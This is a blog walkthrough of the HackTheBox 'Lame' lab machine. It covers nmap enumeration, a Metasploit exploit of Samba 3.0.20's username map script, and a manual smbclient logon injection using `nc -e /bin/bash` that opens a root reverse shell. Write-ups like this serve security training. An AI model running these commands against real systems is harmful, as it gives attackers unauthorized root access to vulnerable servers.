Chinmay Patel
Chinmay's blog

Chinmay's blog

HackTheBox - Lame - Walkthrough

HackTheBox - Lame - Walkthrough

Chinmay Patel's photo
Chinmay Patel
·Jun 23, 2022·

6 min read

Metadata

IP: 10.129.77.236
Difficulty: Easy

Summary

This machine has vulnerable samba version which can be exploited to directly get the root access on the machine. In this post we exploited this vulnerability manually and with the use of metasploit as well.

Enumeration

Nmap

We start off by running an nmap scan:

└─$ sudo nmap -sC -sV -oA nmap/initial 10.129.77.236
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-22 17:50 EDT
Nmap scan report for 10.129.77.236
Host is up (0.11s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.55
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2022-06-22T17:51:29-04:00
|_clock-skew: mean: 2h00m15s, deviation: 2h49m43s, median: 14s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.17 seconds

Port 21

From the nmap results we found ftp version. We started running serchsploit to look for any known vulnerabilities against the version.

└─$ searchsploit vsftpd 2.3.4
--------------------------------------------------------- ----------------------
 Exploit Title                                           |  Path
--------------------------------------------------------- ----------------------
vsftpd 2.3.4 - Backdoor Command Execution                | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)   | unix/remote/17491.rb
--------------------------------------------------------- ----------------------
Shellcodes: No Results

Port 445

From the nmap scan we saw that "Samba 3.0.20-Debian" is running on the machine. We ran searchsploit against it to look for any known vulnerabilities against it.

└─$ searchsploit Samba 3.0.20-Debian
---------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                      |  Path
---------------------------------------------------------------------------------------------------- ---------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass                                              | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)                     | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow                                                               | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC)                                                       | linux_x86/dos/36741.py
---------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Resultsn

Exploitation

vsftpd 2.3.4

I tried executing the exploits we found from searchsploit but it failed.

msf6 > search vsftpd 2.3.4 - Backdoor Command Execution

Matching Modules
================

   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor

msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT   21               yes       The target port (TCP)


Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.129.77.236
RHOSTS => 10.129.77.236
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 10.129.77.236:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.129.77.236:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >

Samba 3.0.20-Debian

We found exploit for vulnerable version on metasploit. We set necessary options and run the exploit. It opened up root shell on vulnerable machine.

msf6 exploit(multi/samba/usermap_script) > set rhosts 10.129.77.236
rhosts => 10.129.77.236
msf6 exploit(multi/samba/usermap_script) > set lhost 10.10.14.55
lhost => 10.10.14.55
msf6 exploit(multi/samba/usermap_script) > exploit

[*] Started reverse TCP handler on 10.10.14.55:4444 
[*] Command shell session 1 opened (10.10.14.55:4444 -> 10.129.77.236:46945 ) at 2022-06-22 19:27:38 -0400

shell
[*] Trying to find binary 'python' on the target machine
[*] Found python at /usr/bin/python
[*] Using `python` to pop up an interactive shell
[*] Trying to find binary 'bash' on the target machine
[*] Found bash at /bin/bash
id
id
uid=0(root) gid=0(root)
root@lame:/#

Manual Exploitation (Without Metasploit)

We started looking for available services on the server using smbclient.

└─$ smbclient -L 10.129.77.236                      
Enter WORKGROUP\kali's password: 
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        tmp             Disk      oh noes!
        opt             Disk      
        IPC$            IPC       IPC Service (lame server (Samba 3.0.20-Debian))
        ADMIN$          IPC       IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            LAME

We have access to the tmp directory through anonymous login. After accessing tmp directory we use help command to see what we can do from the shell.

└─$ smbclient //10.129.77.236/tmp
Enter WORKGROUP\kali's password: 
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> help
?              allinfo        altname        archive        backup         
blocksize      cancel         case_sensitive cd             chmod          
chown          close          del            deltree        dir            
du             echo           exit           get            getfacl        
geteas         hardlink       help           history        iosize         
lcd            link           lock           lowercase      ls             
l              mask           md             mget           mkdir          
more           mput           newer          notify         open           
posix          posix_encrypt  posix_open     posix_mkdir    posix_rmdir    
posix_unlink   posix_whoami   print          prompt         put            
pwd            q              queue          quit           readlink       
rd             recurse        reget          rename         reput          
rm             rmdir          showacls       setea          setmode        
scopy          stat           symlink        tar            tarmode        
timeout        translate      unlock         volume         vuid           
wdel           logon          listconnect    showconnect    tcon           
tdis           tid            utimes         logoff         ..             
!              
smb: \>

We can use logon to get reverse connection to our local machine. To do that we will set up listener on our local machine using below command:

└─$ nc -lnvp 4455
listening on [any] 4455 ...

We used this command to get a reverse shell through smb:

logon "./=`nohup nc -e /bin/bash <IP> <port>`"
smb: \> logon "./=`nohup nc -e /bin/bash 10.10.14.55 4455`"
Password: 
session setup failed: NT_STATUS_IO_TIMEOUT
smb: \>

We got a reverse connection to our netcat listener.

└─$ nc -lnvp 4455
listening on [any] 4455 ...
connect to [10.10.14.55] from (UNKNOWN) [10.129.77.236] 54530
id  
uid=0(root) gid=0(root)

Proof

Use following command for this section:

root@lame:/root# hostname && whoami && cat root.txt && ip a             
hostname && whoami && cat root.txt && ip a
lame
root
646[...]
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
    link/ether 00:50:56:96:bc:a9 brd ff:ff:ff:ff:ff:ff
    inet 10.129.77.236/16 brd 10.129.255.255 scope global eth0
    inet6 dead:beef::250:56ff:fe96:bca9/64 scope global dynamic 
       valid_lft 86398sec preferred_lft 14398sec
    inet6 fe80::250:56ff:fe96:bca9/64 scope link 
       valid_lft forever preferred_lft forever
root@lame:/root#
 
Share this